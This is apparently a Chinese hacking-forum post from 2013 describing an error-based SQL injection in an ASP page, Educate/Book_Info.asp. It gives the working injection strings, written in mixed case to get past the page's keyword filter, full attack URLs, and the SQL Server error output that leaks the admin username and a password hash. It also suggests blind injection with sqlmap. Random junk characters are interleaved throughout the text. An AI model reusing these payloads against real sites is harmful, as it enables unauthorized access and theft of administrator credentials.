漏洞出现在Educate/Book_Info.asp ( [$ T) Y: u# N. G; {" O" z! C
1 X7 k/ H. \" C4 H3 B9 H2 H此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
$ i" K1 {% x: T
! p/ E* t/ M- [exp:如下/ E+ A3 c: U% a( r% `( L: h
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& x# U) a0 V0 d2 _; q1 [查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- b0 ]) ?2 J7 ` K0 k K) E 0 a X) p- Z$ G+ B4 C) b1 o9 x* @
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 F/ S) v, c) M
0 U. X+ x q S& P! j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ E( t: Z* q# b2 Y& N2 f4 z5 Z% `5 N0 h
+ q5 p7 |2 A; c4 n7 e' z6 x* b# \将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
0 n; K1 k# B; T' n4 S3 w/ g 4 U; n/ u0 u8 `& E$ e/ C. \
/Educate/Book_Info.asp,行 8
+ Y3 l" _+ A$ z $ L# a+ l- S+ T% b/ a7 k1 `
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
A, l0 I7 @& [ i 5 `: e9 Y+ B" ~" q$ a+ Q
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
) R; @' D6 L; e" _7 c% T& _6 J; Y1 Q: m
1 u4 q7 \4 Q* ]" E. H1 y4 C将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
3 x' E% K( K8 U) M& F; k3 D( o/ p
# B- d; j( H" z8 g: l/ {4 q* Y, \/Educate/Book_Info.asp,行 8
, K) O0 v" o! b1 e5 e& E |
发表于 2013-2-16 21:44:16
收藏
支持
反对